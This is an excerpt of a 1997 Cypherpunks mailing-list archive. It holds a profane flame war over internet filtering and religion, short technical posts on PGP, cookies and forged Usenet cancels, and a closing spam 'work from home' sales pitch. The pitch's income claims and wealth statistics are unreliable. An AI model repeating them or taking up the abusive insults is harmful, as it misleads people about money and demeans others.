unfortunately is not a well practiced > ideology. And to take the wind out of your sales, I have 2 children and > as a parent I limit them to what is appropriate to their ages.) The word is "sails," not "sales," you illiterate piece of crap who accused me of going out of my way to "slam, belittle, and degrade others" on the list. Why don't you get "? the Platypus" to teach you how to spel? > Until > such time as you can fulfill the obligations to us, the adult computing > population, and our offspring, the children... Unless you have a valid signature of mine on a contract, I do not believe that I am under any obligation to kiss your self-righteous, Christian fucking ass. As a matter of fact, since I am every bit as immature as your saintly children, I believe that the onus is on you to "protect" me from the "immature-adult" molesters and the licensed doctors who prescibe the same drugs for me that I used to get illegally from "drug dealers." > I suggest you rest those busy little > fingers of yours and listen to the underlying theme of the issues before > us. Don't talk while I'm interupting. It's rude. >Until then, HateMonger, I have one suggestion for you..... Shut Up! I have to concede your point, here. I obviously need to be spanked. How's your schedule look for next Friday? TruthMonger "Mad dog in possession of the last false smile." From jrennie at hardy.ocs.mq.edu.au Fri Aug 8 17:27:02 1997 From: jrennie at hardy.ocs.mq.edu.au (Jason William RENNIE) Date: Sat, 9 Aug 1997 08:27:02 +0800 Subject: The BIG Lie (Jesus Confesses) In-Reply-To: <199708081253.GAA06495@wombat.sk.sympatico.ca> Message-ID: Well i was a amused and i'm a Christian. Pity the $%&#wits in the Christian right in America give real Christians such a bad name. Unlike truthmonger seems to think not all Christians are goosesteping fascists who like to bugger little kids for fun and profit. Sadly i guess as long as the fascists claim to be Christians, and try to get everybody to confrom to thier beliefs this sort of post will be in some ways accurate. Jason From mnorton at cavern.uark.edu Fri Aug 8 18:17:48 1997 From: mnorton at cavern.uark.edu (Mac Norton) Date: Sat, 9 Aug 1997 09:17:48 +0800 Subject: Christian CypherPunks / Re: The BIG Lie (Jesus Confesses) In-Reply-To: <199708082338.RAA17953@wombat.sk.sympatico.ca> Message-ID: What we have below is crude but effective. It is a rhetorical crystallization of a point of argument that is persuasively, but somewhat offensively, put. The offensiveness increases the persuasive force, in this particular case, by its attention- getting "shock" value. So here's the thing that occurs to me: This passage would be "censored" by the devices against which it argues. Do you want your nine-year-old to read this passage after returning home from vacation bible school? Probably not. Do you really mind if you fifteen-year-old reads it after asking you what is this debate all about anyway? Maybe not. Consider it then as not only a rant against over-inclusive filter/blockers but as an illustration of the very problem it tries to address. MacN On Fri, 8 Aug 1997, TruthMailer wrote: > What we have in common is that you don't want to have Little Johnny > do a search for "Jesus" and get 5,000 sites with pictures of Jesus > shoving a crowbar up his ass, and I don't want to try to find a site > to buy a crowbar to work on my house and get 5,000 sites with pictures > of Jesus shoving a crowbar up his ass. > My point is that I don't object to you supporting InterNet tools > which allow you to screen out pictures of Jesus with a crowbar up > his ass, but I object to a "quick and easy" solution which blocks > out all sites with a reference to "crowbars," because one guy in > Toledo "used to have" a site with a single picture of Jesus with > a crowbar up his ass. From ravage at ssz.com Fri Aug 8 18:20:12 1997 From: ravage at ssz.com (Jim Choate) Date: Sat, 9 Aug 1997 09:20:12 +0800 Subject: The BIG Lie (Jesus Confesses) (fwd) Message-ID: <199708090112.UAA12633@einstein.ssz.com> Forwarded message: > On 8 Aug 97 at 18:26, David D.W. Downey wrote: > > > Next, this country was founded on christian beliefs, or have you > > failed to read the words of the constitution of the US. Malarky, the country was founded on the belief in a God not a Christian god, considering that Washington and Jefferson were not even Christians pretty much blows that whole Christian promulgated lie. Washington and Jefferson were deist. > Comments from Canada: Libertarians usually attibutes the reference to > the christian cult in the US constitution At no point does the Constitution ever mention Christ. Typical Christian attitude, preach but don't worry about practicing it. And just in case you haven't got the clue yet, I will spell it out. There are MANY groups who believe in a God. Very few of them believe Christ was the son of God and our saviour. I am a Pantheist, I believe in god but I can guarantee it bears absolutely no resemblance to the Christian god. This realization was the whole point of seperation of church and state and my god given right to practice my beliefs even if they aren't rights given by YOUR god. You need to retake Spin_Doctor_101 if you are going to try to pull that sort of wool over peoples eyes ... ____________________________________________________________________ | | | Participation requires more than just bitching! | | | | _____ The Armadillo Group | | ,::////;::-. Austin, Tx. USA | | /:'///// ``::>/|/ http:// www.ssz.com/ | | .', |||| `/( e\ | | -====~~mm-'`-```-mm --'- Jim Choate | | ravage at ssz.com | | 512-451-7087 | |____________________________________________________________________| From dlv at bwalk.dm.com Sat Aug 9 09:31:56 1997 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 9 Aug 1997 09:31:56 -0700 (PDT) Subject: REPOST : Un-forgeable Cancels In-Reply-To: <12952.9708081327@misun2.mi.leeds.ac.uk> Message-ID: jbaber at mi.leeds.ac.uk writes: > From what I can see (the full README is unavailable) PGPMoose is designed > to Cancel messages in a moderated newsgroup that have not been approved by > the moderator - by using PGP sigs to authenticate the approval. > > see http://people.qualcomm.com/ggr/pgpmoose.html Given that Qualcomm employs Paul Pomes, who harrasses anonymous remailer operators by complaining to their upstreams and employers, I advise you to be wary of anything coming out of Qualcomm - like their Eudora mail reader. > This could be modified for general cancels but would then involve PGPMoose > having access to every authors Public Key. A program that would search the news for articles that purport to be from people who requested this service (and may be paying for it), verifying their digital signatures, and issuing "hide" NoCeMs for the ones that fail this check (possible forgeries) would be a good thing indeed and would encurage the use of digital signatures. As I pointed out before on the Cypherpunks list, signing only the body of the article leaves one open to replay attacks: a forger can repost the same signed article with new message-id and possible in new newsgroups. Therefore at least both of these header fields need to be signed. Perhaps the folks who participate in Brad Templeton's "son-of-rfc1036" mailing list would like to propose a generaliaztion of the new headers used by pgpmoose to sign the headers of an article together with it body. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From amp at pobox.com Fri Aug 8 18:32:57 1997 From: amp at pobox.com (amp at pobox.com) Date: Sat, 9 Aug 1997 09:32:57 +0800 Subject: PGP 5.0 Questions Message-ID: -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 I've been digging through the PGP 5.0 documentation to figure out how to do a few things, and I have a few questions for those of you who might know about such things. I'm using the freeware version at the moment, though if I can show the benefit and ease of use of the software, my department at work will be buying a copy for each of us. To quote the documentation... "PGP offers a selection of different secret-key algorithms to encrypt the actual message. By secret key algorithm, we mean a conventional, or symmetric, block cipher that uses the same key to both encrypt and decrypt. The three symmetric block ciphers offered by PGP are CAST, Triple-DES, and IDEA." I can not figure out how to make PGP encrypt a message with a 'conventional' such as 3-des. Is this only available in the commercial version? When invoking PGP against a file, as opposed to the clipboard, is there a way to tell it to ascii-armor the resulting encrypted file by default? The documentation leaves much to be desired along these lines. It is somewhat useful as a primer on crypto and some of the issues involved, but I already am familiar with all that. I just want to know how to use the program to make it do what I want. I kinda miss the command line interface, and simple help screen invoked with "pgp -h". I realize I could still make use of pgp 2.x, but I need something windows-simple for the folx at work. Any assistance would be greatly appreciated. alan - ------------------------ Name: amp E-mail: amp at pobox.com Date: 08/08/97 Time: 20:08:38 Visit me at http://www.pobox.com/~amp 'Drug Trafficking Offense' is the root passphrase to the Constitution. Have you seen http://www.public-action.com/SkyWriter/WacoMuseum - ------------------------ -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQA/AwUBM+u2AqnrEX/KhUDiEQJEEQCfQ3QOCJehlPJMh6IJ/CgCnZRbo8cAoOvE bH2cd1W4qKSKYkYCpnRS/TSM =Ntfv -----END PGP SIGNATURE----- From ravage at ssz.com Fri Aug 8 19:05:13 1997 From: ravage at ssz.com (Jim Choate) Date: Sat, 9 Aug 1997 10:05:13 +0800 Subject: Book recommendation Message-ID: <199708090155.UAA12755@einstein.ssz.com> Hi, Not really crypto relevant but it does cover many other issues that get covered here regularly. Maximum Security: A hacker's guide to protecting your internet site and network Anonymous ISBN 1-57521-268-4 $49.99 (w/ CD) Covers Microsoft, Unix, Novell, VAX/VMS, Mac, Plan 9 hacking techniques. "The author is an experienced computer hacker who now specializes in testing the security of various networking platforms by breaking into computer networks and subsequently revealing what holes led to the unauthorized entry. In the late 1980's, the author was convicted of a series of financial crimes after developing a technique to circumvent bank security in automatic teller machin systems; he therefore prefers to remain anonymous." LLoyds' (The Mentor) "Hacker Manifesto" is included on the inside cover. ____________________________________________________________________ | | | Participation requires more than just bitching! | | | | _____ The Armadillo Group | | ,::////;::-. Austin, Tx. USA | | /:'///// ``::>/|/ http:// www.ssz.com/ | | .', |||| `/( e\ | | -====~~mm-'`-```-mm --'- Jim Choate | | ravage at ssz.com | | 512-451-7087 | |____________________________________________________________________| ps it just occurred to me that being written by anonymous will cause this book to show up in lots of porno books on a author search, poetic justice or masterful craftsmanship? From nobody at REPLAY.COM Fri Aug 8 19:48:13 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sat, 9 Aug 1997 10:48:13 +0800 Subject: jThe BIG Fly / Re: The BIG Lie (Jesus Confesses) (fwd) Message-ID: <199708090224.EAA14051@basement.replay.com> Jim Choate wrote: > I am a Pantheist, I believe in god but I can guarantee it bears absolutely > no resemblance to the Christian god. I am a Frisbeetarian. I believe that when you die, your soul goes up on the roof, and you can't get it down. LassieMonger From dlv at bwalk.dm.com Fri Aug 8 20:30:36 1997 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Sat, 9 Aug 1997 11:30:36 +0800 Subject: Query on cookies In-Reply-To: <199708081336.GAA04744@toad.com> Message-ID: "Peter Trei" writes: > Well, I'm using version 4.01a for NT. There are three settings for > cookies: > > 1. Accept all cookies. > 2. Accept only cookies which get sent back to the originating server. > 3. Disable cookies. Does #2 mean that if your "main" page is from d1.com and it calls something from d2.com that tries to set a cookie for d2.com, it's not allowed? What if it's in a frame? --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dformosa at st.nepean.uws.edu.au Fri Aug 8 20:57:48 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Sat, 9 Aug 1997 11:57:48 +0800 Subject: forged cancels (Re: Entrust Technologies's Solo - free In-Reply-To: Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Thu, 7 Aug 1997, Dr.Dimitri Vulis KOTM wrote: [...] > > What if the message is > > forged in such a way that it looks exactly as if it came from you? > > Ditto, and consider setting up a service to automatically issue NoCeMs > for forgeries. In fact consider setting up a service to automatically issue NoCeMs for bad pgp sigs. - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBM+usWqQK0ynCmdStAQGWnAQAskTxuMw3EWKj584gh+dLnazsVnfeKmKX M9t5IlTgzBhCm8AMd0R9arITI+QHWdGIeOfReP0TijjL1/fZSQvq9uA2QRRlAUf0 FuoeAEBXgo1PFcLd22JFA18X1140Z+i0Eocx4eYNJLck+0SKwJzKK7NmBOAvm1Vj wQcz7GBHxyc= =1rUK -----END PGP SIGNATURE----- From dformosa at st.nepean.uws.edu.au Fri Aug 8 21:04:22 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Sat, 9 Aug 1997 12:04:22 +0800 Subject: forged cancels (Re: Entrust Technologies's Solo - free In-Reply-To: <19970808003832.21296@bywater.songbird.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Fri, 8 Aug 1997, Kent Crispin wrote: > On Thu, Aug 07, 1997 at 10:00:25PM -0500, Dr.Dimitri Vulis KOTM wrote: [...] > > Use a retraction server (David's project) > > Just curious -- how would this be morally different from doing a > cancel? Well NoCeMs are harder to abuse, in addtion there are thay can be treated more flexibly then the blunt interestrment that are cancels. - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBM+utV6QK0ynCmdStAQGG6QQArND+QSSeZR4Fd2hz022teFJEWz0h/Ndo xcyiV98aXPIGOOiKKNXyWYqZKfZYkfRPQFVHWkkLvuPTsOcpj2iLmb5iZwjxgfGc Qrq7kocfGVN7VuGeS8uEeK+eWhvHdIfKB1C4ZBjHAXjPx7aVWSh/qbVBA8ZFlnZT vfG1zN7CBsA= =PQCw -----END PGP SIGNATURE----- From admin at CyberSpaceTechnologies.com Fri Aug 8 21:25:58 1997 From: admin at CyberSpaceTechnologies.com (David D.W. Downey) Date: Sat, 9 Aug 1997 12:25:58 +0800 Subject: The BIG Lie (Jesus Confesses) In-Reply-To: <199708081253.GAA06495@wombat.sk.sympatico.ca> Message-ID: <33EC2214.6BEA2C9A@cyberspacetechnologies.com> >Paul H. Merrill wrote: > judeo-christian isn't a religion. Christian is. > Judeo- Christian is a subsect of Christianity in it's generic form. (Both my parents are ministers, and this has been drilled into my head.) > I have read the Constitution and the history behind it. >The US was founded by people trying to escape religious >persecution and/or trying to get rich. In case you can't >figure it out, forcing your views down my throat IS >religious persecution -- exactly the same sort that sent > the Pilgrims off on the Mayflower. > 1) I am not forcing my beliefs down *anyone's* throat. I do not seek to control but to inform. As to the constitution, I served 8 years in the military so I have a pretty good idea of what it does and does not mean. I do not advocate internet control to the point of demanding that site rankings or any such become mandatory. I do however agree that if we can not police ourselves then this should be a warning that others may do it for us. When the Protestants (originally the Quakers), came here, you are correct in why they did come here, yet they also agreed among themselves to police their actions themselves. This is something we are failing to do. We are allowing stuff that children need not to see at certain ages to proliferate all in the name of "If we don't allow this freedom of expression to take place, it sends a signal that *all* freedoms are up for grabs." That is simply not true. What is being proposed is that a little common decency be exerted. After all, these are children we are talking about. They do not have the capacities that we do to process all information relating to certain issues. We have experiences on our side that children do not, just through sheer lack on their part of numbers of years on this planet. I mean are you really suggesting that a child has the cognative abilities, at say the age of 6, to understand and make an informed opinion about sex with an older person? I hope not! I mean, let's be realistic here. We have knowledge gained thru living that children do not. I am in no way suggesting that we blindly stuff all things remotely offensive off the net. I am saying let us be responsible enough to give this information to our children in doses they can handle. And yes, I will be the judge of what I feel my children can handle. What is so wrong with adults putting a statement on their sites that say, Hey parents, there *may* be info here that you might want to be aware of for the kids' sakes.? > That statement is somewhat similar to saying that if you >don't like your chains you are free to suggest the stocks >or perhaps rope. > No, what I am saying is that if he doesn't like what has been proposed to suggest an alternative in an adult fashion. I don't see how slamming and belittling helps discussions. > As long as the scum that gravitates toward LEAs and the >Government continue to do so it is relatively stupid to >express (or defend) views outside the accepted norm in an >open fashion. (I guess that makes me sorta stupid, huh?) > Not true. I will never agree with what our government proposes. In fact I have an entire website dedicated to going *against* what the current government proposes. I do not believe in the taking away of rights or the forcing of a country's people to *have* to do half of what the American government proposes. What I do suggest is that we, as a community, need to look to ways that we can balance these issues out in a manner that is agreeable to all involved. Inflammatory attacks, degradation of someone based on cultural or religious beliefs has no place in the discussions. The only reason I flamed at TruthMonger is because I have only seen postings from that person that violates that very critical issue. Everyone has the right to their opionions right, wrong or otherwise. I just got sick of hearing him flame everyone with a contrary view. And he seems to do this under the suggested banner of truth. That I do not agree with. I don't condemn him for his views. They are just as important as mine. I condemn his actions in slamming others for not agreeing with *him*! > I have two of my own and I don't see how "protecting" them >in the ways that you seem to like would do anything other >than warp their worldview to such a level that they will be >esay prey for whatever scum they run into in the meatworld. > There is a difference between warping their views and ensuring that they are mentally able to engage themselves in these issues. The issues that befall each of us require an ability to see deeper into the causes, actions and reactions of those with whom we interact. We have many things, as adults, that we can bring to the tables of rationality and discussion due to the fact that we learned through prior experiences. Each and every one of us have sought guidance on any myriad of issues. We are leaving a confusing mess for the next generation. I am just saying that we may need to band together to give all of us some sort of cue card as to what issues may be faced at various stops along the way as we ride the information highway. > I don't know about TruthMonger but I did listen to the >underlying theme of the issues before us and I found that >it was actually scum-suckers and other bottom feeders >trying their damnedest to steal my freedom. That's why I'm >typing here and now. > I will grant that there are some out there that advocate the taking away of rights. I am not one of them. I have bullet holes in me because I am willing to put my life on the line for freedom and rights. I don't agree with alot of what hardliners have to say. But they also have a say in this. I will defend my rights and the rights and freedoms of others with my last breath if need be. All I am saying is that there is a constructive way to do things. Let's do it that way. I am no stranger to being a politician's trump card to be played when all else fails to get folks to listen at the talk tables. That is the very nature of soldiering. Yet, I also am not afraid to turn what I learned from them against them if they should so force that issue. In short, yes, I will use violence if *all* else fails to get them to listen to reason. But that is after exhausting all other avenues of approach. The reason I slammed "TruthMonger", is because I have yet to hear anything from him other than pure rhetoric and inflamation. I am willing to listen to what he has to say. Provided that he at least has some meat to his words, not libel and slander. These solve nothing, and contribute even less. > The hatemonger that I see in this interchange is not >TruthMonger and it's not me -- Let's see, I guess that >leaves . . . > Everyone is entitled to their own opinion. If you feel that I am a HateMonger, you are entitled to that opinion. I am entitled to my opinion that TruthMonger is anything but a TruthMonger, but is a HateMonger. I will defend both your and mine opinions. I believe in the ability to agree to disagree. I agree. I may have been hotheaded and gone too far in my last email. For that I will apologize, both to members of this list, as well as TruthMonger. I will not apologize for my opinion of him. From admin at CyberSpaceTechnologies.com Fri Aug 8 22:21:43 1997 From: admin at CyberSpaceTechnologies.com (David D.W. Downey) Date: Sat, 9 Aug 1997 13:21:43 +0800 Subject: The BIG Lie (Jesus Confesses) In-Reply-To: <199708082242.AAA20104@basement.replay.com> Message-ID: <33EC319A.4B93198@cyberspacetechnologies.com> Before we go on with this, let me just say that I disagree with alot of the "christianity" presented in today's world. I go to no church, for which my parents do indoubtably lament emensely. (They are both ministers. Ironic) I am open to many different views. My best friend in the world is buhdist(sp?) and I heavily study martial arts, in which I excell only because of my study of the culture and religous background involved with martial arts. I am the *farthest* person from advocating or backing many of the suggested plans of the christian community in dealing with these issues. Anonymous wrote: > > The size of the majority does NOT have anything to do with >what's "right", particularily when it comes to religion. > You are correct, I was merely responding to his statement. > That much I have read. And nowhere do I see that >"Christian beliefs" are the cornerstone of our country. > To show how much this country *was* in fact based upon Christianity, one has only to look at our money. "In *God* we trust. Also, the majority of our founding fathers were in fact christians. Yet they correctly surmised that plans needed to be made and coopertive efforts begun between all the people in order for harmonious living to be even a remote possibility. >As a matter of fact, I see writing that specifically says >that religion is NOT a part of our government, and that the >two shall NOT intermix. Very specific. > Yes, yet also that ruling came into existence *long* after the constitution had been designed, ratified, and accepted by the original colonists. And this was passed after the Church became far too powerful, and a few tried to influence the whole via a emensely powerful political base. (We can thank the Roman Catholic church for the necessity of this law.) >SOME of the founders of our country were personally very >religious. But some of them were atheists. They were a >mix of beliefs. However, all of them felt the persecution >of the English theocracy, and were writing the Constitution >specifically to avoid creating such an evil monstrosity >here. I think they did a good job. > They did an *excellent* job. I fought to ensure that the work they did, did not come undone in our time. (I am sorry, I can not go into specifics.) Also, they were correct in trying to keep the English form of government out of the new country. Unfortunately, I doubt if any of them would be happy with the government of today, as many of the spirits residing within the wording of the constitution are blatently violated on an everyday basis by our current government. I am sure many would be down right pissed at what is taking place today! >They wanted the freedom to practice their own religions >here. They officially did NOT lay down WHICH religions >were to be practiced. That's why we all fight to keep the >net out of Christian hands. > I do not know how to correctly word my thoughts on that statement so I will decline for the moment. You seem to think that I am one of the christian members who thinks that anything even remotely repulsive or offbeat should be expunged from the net. You could not be more wrong. But I do not know the words to explain what I feel and think on this issue. Or at least in a way that would not come out wrong. > My surefire plan, which has worked **100%** is to monitor >my child's net surfing. He's 9, and I really don't want him >stumbling into www.seXXX.whatever. > I agree that that is one of the things needed. Responsible parenting. I don't want mine doing that either. I guess what I am saying is that, for those parents that do not do that, don't we have an obligation to at least think of those children that do *not* have that? I mean, don't we at least have the moral obligation to *not* take the stance of "Fuck them!"? I care for all children, not just my own. These children are going to take the reins of this world from *us*. They will either contribute to this world or detract from it. I'm suggesting that we come together to responsibly teach them about the world around them. It is big, complex, and scary, even for adults. Let's not just throw them to the wolves and say "Fend for yourselves." There are some things that have the major potential to be harmful to a child's psyche out on the net and in real life. No, let's not ban things just because they are offensive to some. I do suggest that some things have no place either in cyberspace or the real world. Why? Because society in general has agreed that these things are an affront to the community as a whole. Either locally or globally. Take NAMBLA (National Man/Boy Lovers Association), who feel that a 5 year old child is capable of making an informed decision on whether it is OK for him (the child) to have sex with an older man. 5 YEARS OLD!!??!!?? I don't think so. And neither does a *majority* of the world population! These types of things are policed by law enforcement agencies on and off the net, majoratively, by the general public across the globe. *These* issues are the ones that I would ban. Yes, if that violates the rights and freedoms of a few, then yes. I would do it, for the good of the majority. I'm not talking about pissing in a cup and putting a cross in it and then calling it art. These issues are mundane compared to issues like NAMBLA. I don't agree that it is art, but I don't advocate denying them the right to do so. > When he's old enough to handle reality when he trips over >it, I'll let him. That's MY job. Not yours. > I never said it was my job. I would use my best judgement in the event of your absence, but when you are available it is definitely your choice. > Do you let your child walk unescorted through the streets >of New York City? London? Moscow? Singapore? Chicago? >Detroit? Beijing? If so, I hope that you are arrested for >neglect. You have no business turning an unescorted child >loose on the streets. > I agree wholeheartedly and would testify to such at your trial. Yet, then the question becomes one of: If you feel that way about the streets of NY and the like, then why the difference of opinion about the internet? Is it because it is a virtual place? You think of physical damage to the child. Ideas and mental damage have far longer, and deeper, lasting effects than most physical injuries. > Parents who do not monitor their children on the net are >as guilty of neglect as those who would turn them loose on >the streets of a foreign city. > Once again we are in agreeance. > You have no business turning an unescorted child loose on >the web. Are you prepared to have him put his e-mail >address into some stranger's form? www.childstalkers.com >or www.lolitawatch.org(tm) might love to have it. > Yet again we agree. > The web is an adult place, where adult thought is allowed >to flow. > Yes it is, yet more and more children are gaining access to the net everyday. One major contributing factor to this is the use of computers in school, of which I am a major advocate. > > The whole point of allowing adult thought is this: > > We couldn't even have this discussion on a > "Judeo-Christian-child-safe" Internet. > > Think carefully about this. > I never suggested that we sanatize the net into that. > Now, to answer why we're opposed to ratings, look at the >"voluntary" ratings labels placed on music albums. There >are major discount stores that WILL NOT CARRY CDs that are >labeled "Warning: Adult Lyrics." The "voluntary" label >means the loss of thousands of retail outlets, and the >potential loss of tens of thousands of sales, all because >the record company thought it best to voluntarily be >"child-safe". Other stores require you to be 18 to purchase >them, and require ID. There are municipalities that have >considered laws to make it illegal to sell these >"voluntarily labeled" albums to children under 18. > If the songs are about expression then, no. Don't ban them. But if they advocate the killing of cops or how great it is to be a gangster and shoot other people like Vanilla Ice and Snoop Doggy Dog did, then yes. I say ban them. Why? They violate the very principles of life... life is sacred, and it's they only one we got. > So, if there were a net rating system that became widely >used, you can bet your child's college money on the fact >that every major corporation in the United States will put >a ratings filter on their firewall. The entire Internet >service to Singapore, Malasia, Indonesia and China will be >filtered by ratings. Half the ISPs in the USA will >probably follow suit, as will AOL and Prodigy. That is why >a rating system is so bad. > There is a major difference bewteen rating a site and completely banning a site due to it's rating in that system. No organization has the right to make the decision for me about whether or not I can have access to that site even if it falls into the "filth" rating. That is *my* choice and decision to make not theirs'. Therein lies the problem, not in the rating system itself. The problem develops when these groups tell me I can not access them. Their rating system, my choices. > There's plenty of precedent for clamping down on >ThoughtCrime. > Define your idea of thoughtcrime and we'll see just how much we really disagree. >YOU want to clamp down on ThoughtCrime. That's why YOU are > dangerous to society. Not the pornographers. YOU, the >censors. > LOL, not *even* going to waste time on *that* statement! From admin at CyberSpaceTechnologies.com Fri Aug 8 22:24:04 1997 From: admin at CyberSpaceTechnologies.com (David D.W. Downey) Date: Sat, 9 Aug 1997 13:24:04 +0800 Subject: [Fwd: [Fwd: Virus Warning]][Fwd: Virus Warning] Message-ID: <33EC326A.31390DFF@cyberspacetechnologies.com> An embedded message was scrubbed... From: unknown sender Subject: no subject Date: no date Size: 1155 URL: From 09188466 at hydra.com.au Sat Aug 9 13:43:11 1997 From: 09188466 at hydra.com.au (09188466 at hydra.com.au) Date: Sat, 9 Aug 1997 13:43:11 -0700 (PDT) Subject: INTERNATIONAL COMPANY SEEKS HELP!! Message-ID: <>


Hello!

We are a multi-billion dollar per year international company that is looking for serious, teachable, motivated people who want to start a business from their home.  We are not looking for people who are unemployed and looking for a job.  We need people who want to spend time with their families while making a substantial amount of money. If this describes you, please read on!

Take a few minutes to read the following booklet very carefully right now.  This booklet has been extraordinarily successful in both direct mail and e-mail form and has absolutely been the answer to many peoples' dream of freedom to work around their families/children, AND having complete control over their lifestyle and income.  All you need to do to begin is carefully read the information and follow the instructions.

This is a Direct Marketing program that will have interested people contacting you.  You do not need any special schooling; training is provided and no experience is necessary.  If you are teachable and motivated and would like to earn income from home, then we want to get you started TODAY.

Unlike most Work-at-Home "opportunities", this is not envelope stuffing or home assembly where the work is hard and the compensation is low.  This is a very lucrative business opportunity that has allowed me to almost double my income in the last year!

It is very important that you read the booklet thoroughly so that you may begin the training on how this program works.  It will describe the smart way to make money and keep it.  After reading the booklet, there will be a phone number for you to call that will put you into a short recording that will ask you to leave your name and address in order to receive our startup materials which you will have 30 days to inspect.  The materials cost only $39.00 and are fully guaranteed to be exactly what you are looking for or your money is refunded.

PLEASE NOTE: Because of our tremendous success and the overwhelming response to our advertising, we can afford to be picky about who we choose to work with to make a lot of money - for this reason, you are going through this screening process of reading the book and calling the number.  Many people who are just "tire-kickers" will not get that far - this is exactly what we want.  By the time you call and order the startup information, we will know that you are one of the serious ones who ARE teachable and motivated.  It is you that we want, not the people who get screened out because they are lazy or not teachable enough to follow these simple instructions.

I can only encourage you with all my heart to not get screened out!  You are sitting on a gold mine as you read this letter.  After you follow the instructions in the booklet, you will be put in contact with a local person to help you and guide you through your new way of life.  This person will help you start your new, exciting future!

Sincerely,


M. Bishop












                     WORK FORM HOME E-MAIL BOOKLET

WORK FROM HOME!!

TAP INTO A $427 BILLION DOLLAR INDUSTRY THAT WANTS YOU!

LET US SHOW YOU HOW!

IMAGINE ... YOUR FUTURE ...

You live in the home of your dreams
You drive the car of your dreams
You experience the vacation of your dreams, with your family
You love what you do every day ...
You are happy ...

WE CAN TAKE YOU THERE!!

Dear Friend,

Have you ever driven by a mansion and wondered how somebody could possibly afford to live there, and not be doing something illegal? Or seen people having a leisurely lunch at a lavish restaurant as you rush back to work after eating fast food?  How can people living in the same country, with the same education, and the same skills, be living such different lives?  

Many of us try to live a little better by using finance companies to buy things we couldn't otherwise afford.  I had a real eye-opening experience when I bought some furniture.  The salesman told me it was "90 days same as cash".  When it didn't look like I could pay the money back in 90 days, they told me it was no problem, I could make payments.  Then I read the fine print and almost fell over when I realized they were going to charge me 29% interest!

Another sad fact is he percentage of money saved or invested in our country.  We rank last in the western world in terms of money in savings, and first in terms of credit card debt. Think of what would happen if anything happened to you, and your family had to take on your financial situation right now.  If you think you are safe with the credit card protection offered by the card companies, read the fine print.  They only pay the minimum each month which again only covers the interest!  The finance companies win again. 

DID YOU SAVE $12,000 LAST YEAR?  $1200?  $120?  ANY?

How much will you have saved in the next five years?  If things don't drastically change, you can double your last five years savings amount and you will have your answer.  For most people, that is not a pleasant prospect.  But say you are one of the lucky people who have some savings, and you look forward to living off the interest in retirement, well!!..

WHAT ABOUT RETIREMENT?

Did you know that it takes a bank account of over $250,000 earning at least 5% interest to provide a monthly income of about $1,150?  That is roughly the welfare allowance of a single mother of four!  When do you think you'll have your $250,000 in the bank?  And in 10 to 20 years will you pay the electric bill or the phone bill with $1,150 per month?  If this sounds drastic, the reality is even worse.  What about the medical bill emergencies that may pop up?  They usually become more frequent as you get older.

What to people do?  Do you want the truth?  95% die broke after working 40 years.  U.S. NEWS & WORLD REPORT wrote, "Many people will need to keep earning a paycheck into their 70s!  It's too late for them to save enough to quit working at 65."

Consider this.  The Bureau of Labor Statistics revealed that out of 100 people who start working at age 25, by the age of 65 ...
   
* 1% Are wealthy
* 4% Have adequate capital for retirement
* 3% Are still working
* 63% Are dependent on Social Security, friends, relatives or charity
* 29% are dead

How does $40,000 per year sound?  If you wish to retire with this income, it would take $1.9 Million in tax-deferred accounts to provide that income if a 35-year-old today would retire at age 65!! That means you would have to be able to save $3,333.33 PER MONTH starting now!  Can you possibly save that kind of money with your current income?  And imagine what $40,000 will be worth in 30 years.  That income would probably keep you at poverty level in the year 2027.

SO WHAT'S THE ANSWER?

The answer is usually simpler than you might think.  Unless you inherited a large sum of money or hit the lottery, people with an above average lifestyle usually work for themselves!  Here is the breakdown of who controls the most percentage of wealth in America ...

* 74%  PEOPLE WHO OWN THEIR OWN BUSINESS
* 10% Top executives and CEOs
* 10% Professionals like doctors and lawyers
* 5% Sales People
* 1% Everyone else!

Those figures used to make me mad because I used to be in the 1% category!  I worked as hard as I could for 40-60 hours per week and all I did was make someone else more money.  Then I looked at the percentage of taxes I was paying, and I realized it was higher than the percentage others paid who were making ten times what I was!  The reason was I couldn't write anything off if I worked for someone else.  ALL my income was taxable.
 
I soon understood that the laws and the odds in America favored those who ran their own businesses.  My first problem was, I had no business training or experience, and secondly I was broke! At that time in my life the only job I had held was as an electrician and my wife Candace's experience came from being a secretary in the construction business.  My confidence level to make a change in my life was zero.  On the positive side, I was mad about how unfair it all seemed.  This anger finally got me into ACTION when the right opportunity presented itself.

I GET MY CHANCE!

My life changed when a friend of mine shared the information you are getting in this booklet.  What he presented to me was a turnkey work-at-home business that I could start with the skills and money I had, and have immediate success, so I was encouraged to continue.  With the power of our advertising and mail-order system, I didn't even have to know anybody in my local area!  In the first month, I earned $1,735.60 profit part-time from my home.  By my eleventh month I made over $10,000 a month, and now for five years my income working from home has been steady and is currently over $25,000 PER MONTH!

At this point you might think, "Oh, this can't be true - all of these things are a scam" or "These things only happen to other people."  Well I'm here to tell you not only am I one of those "other" people, but I have trained many of those other people who are now living the life of their dreams.  Many of them have EXACTLY YOUR background.

YOU CAN DO THIS!  THE SECRET IS OUR SYSTEM

